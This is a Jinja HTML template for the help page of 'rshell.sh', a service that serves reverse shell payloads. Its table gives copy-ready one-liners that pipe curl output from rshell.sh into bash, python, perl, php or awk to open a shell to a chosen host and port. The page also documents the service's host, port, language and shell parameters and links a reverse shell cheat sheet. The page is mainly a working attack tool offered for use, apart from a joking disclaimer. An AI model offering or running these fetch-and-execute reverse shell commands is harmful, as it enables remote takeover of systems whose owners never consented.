{% extends 'base.html' %}

{% block head %}
<style>
	table,th,td {
	  border: 1px solid white;
	}
</style>
{% endblock %}

{% block body %}

<h1>rshell.sh - Help Page</h1>
<h2>Reverse Shell Payload Microservice</h2>
<img style="position:fixed; right:30px; top:20px; height:25; width:25; background-color:white" src="static/img/white-hat.png">

<hr>

<a name="SupportedLangs"></a>
<h3><u>Supported Languages</u></h3>
  <table>
	<tr>
      <th>Language</th>
      <th>Stdin</th>
	  <th>Xargs</th>
	</tr>
	<tr>
      <td>Bash</td>
      <td>
		<button onclick="copyBashStdin()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345 | bash">✅</span>
		</button>
		<script>
		  function copyBashStdin() {
			var bashStdinStr =  "curl -s rshell.sh/127.0.0.1/12345 | bash";
			navigator.clipboard.writeText(bashStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + bashStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyBashXargs()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/&quotes=single | xargs bash -c">✅</span>
		</button>
		<script>
		  function copyBashXargs() {
			var bashXargsStr =  "curl -s rshell.sh/127.0.0.1/12345/?quotes=single | xargs bash -c";
			navigator.clipboard.writeText(bashXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + bashXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Python3</td>
      <td>
		<button onclick="copyPythonStdin()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/?lang=python | python">✅</span>
		</button>
		<script>
		  function copyPythonStdin() {
			var pythonStdinStr =  "curl -s rshell.sh/127.0.0.1/12345?lang=python | python";
			navigator.clipboard.writeText(pythonStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + pythonStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPythonXargs()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/?quotes=single&lang=python | xargs python -c">✅</span>
		</button>
		<script>
		  function copyPythonXargs() {
			var pythonXargsStr =  "curl -s rshell.sh/127.0.0.1/12345/?quotes=single&lang=python | xargs python -c";
			navigator.clipboard.writeText(pythonXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + pythonXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Perl</td>
      <td>
		<button onclick="copyPerlStdin()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/?lang=perl | perl">✅</span>
		</button>
		<script>
		  function copyPerlStdin() {
			var perlStdinStr =  "curl -s rshell.sh/127.0.0.1/12345/?lang=perl | perl";
			navigator.clipboard.writeText(perlStdinStr);
			alert("Text Copied!" 
				+ "\n\n\t" + perlStdinStr);
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPerlXargs()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/?quotes=single&lang=perl | xargs perl -e">✅</span>
		</button>
		<script>
		  function copyPerlXargs() {
			var perlXargsStr =  "curl -s rshell.sh/127.0.0.1/12345/?quotes=single&lang=perl | xargs perl -e";
			navigator.clipboard.writeText(perlXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + perlXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>PHP</td>
      <td>
		<button onclick="copyPHPStdin()">
		  <span title="No Stdin Option For PHP.">❌</span>
		</button>
		<script>
		  function copyPHPStdin() {
			alert("No Stdin Option for PHP.");
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyPHPXargs()">
		  <span title="Copy: curl -s rshell.sh/127.0.0.1/12345/?quotes=single&lang=php | xargs php -r">✅</span>
		</button>
		<script>
		  function copyPHPXargs() {
			var phpXargsStr =  "curl -s rshell.sh/php/127.0.0.1/12345/?quotes=single&lang=php | xargs php -r";
			navigator.clipboard.writeText(phpXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + phpXargsStr);
		  }
		</script>
	  </td>
	</tr>
	<tr>
      <td>Awk</td>
      <td>
		<button onclick="copyAwkStdin()">
		  <span title="No Stdin Option For Awk.">❌</span>
		</button>
		<script>
		  function copyAwkStdin() {
			alert("No Stdin Option for Awk.");
		  }
		</script>
	  </td>
      <td>
		<button onclick="copyAwkXargs()">
		  <span title="Copy: curl -s rshell.sh/awk/127.0.0.1/12345/?quotes=single&lang=awk | xargs awk">✅</span>
		</button>
		<script>
		  function copyAwkXargs() {
			var awkXargsStr =  "curl -s rshell.sh/awk/127.0.0.1/12345/?quotes=single&lang=awk | xargs awk";
			navigator.clipboard.writeText(awkXargsStr);
			alert("Text Copied!" 
				+ "\n\n\t" + awkXargsStr);
		  }
		</script>
	  </td>
	</tr>
  </table>

<a name="SupportedShells"></a>
<h3><u>Supported Shells</u></h3>
<ul>
<li>Bash</li>
<li>Csh</li>
<li>Zsh</li>
<li>Ksh</li>
</ul>

<h3><u>GET Parameters</u></h3>
  <table>
	<tr>
      <th>Key</th>
      <th>Value</th>
	  <th>Example</th>
	  <th>Description</th>
	</tr>
	<tr>
      <td>quotes</td>
      <td>single, double</td>
	  <td><a href="/10.0.0.1/1234/?quotes=double">rshell.sh/10.0.0.1/1234/?quotes=double</a></td>
	  <td>Output wrapped in double quotes.</td>
	</tr>
	<tr>
      <td>shell</td>
      <td>See, <a href="#SupportedShells">Supported Shells</a></td>
	  <td><a href="/10.0.0.1/1234/?lang=python&shell=zsh">rshell.sh/python/10.0.0.1/1234/?lang=python&shell=zsh</a></td>
	  <td>Type of reverse shell that is sent.</td>
	</tr>
  </table>
<h3><u>API Options</u></h3>
  <table>
	<tr>
      <th>Key</th>
      <th>Value</th>
	  <th>Description</th>
	</tr>
	<tr>
      <td>host</td>
      <td>IPv4_ADDRESS</td>
	  <td>IPv4 address of remote host.</td>
	</tr>
	<tr>
      <td>port</td>
      <td>PORT_NUMBER</td>
	  <td>Target port of remote host.</td>
	</tr>
	<tr>
      <td>lang</td>
      <td>See, <a href="#SupportedLangs">Supported Langs</a></td>
	  <td>Reverse shell payload language.</td>
	</tr>
	<tr>
      <td>shell</td>
      <td>See, <a href="#SupportedShells">Supported Shells</a></td>
	  <td>Type of reverse shell that is sent.</td>
	</tr>
  </table>

<h3><u>Extras</u></h3>
<ul>
<li>Python Shell Reset</li>
<pre>
curl -s rshell.sh/reset
</pre>
<li>Command Line Friendly Help Menu</li>
<pre>
curl -s rshell.sh/help | less
</pre>
</ul>

<br>

<p style="color: red"><u><b>No Use 4 Bad Hax!!!</b></u></p>

<br>
<a href="/">Main Page</a>
<br>
<a href="https://github.com/BlueSquare23/Rshell.sh">Project's Github</a>
<br>
<a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md" target="_blank">Comprehensive Payload List</a>

<!-- For top img alignment -->
<pre>
                                                      
</pre>
{% endblock %}
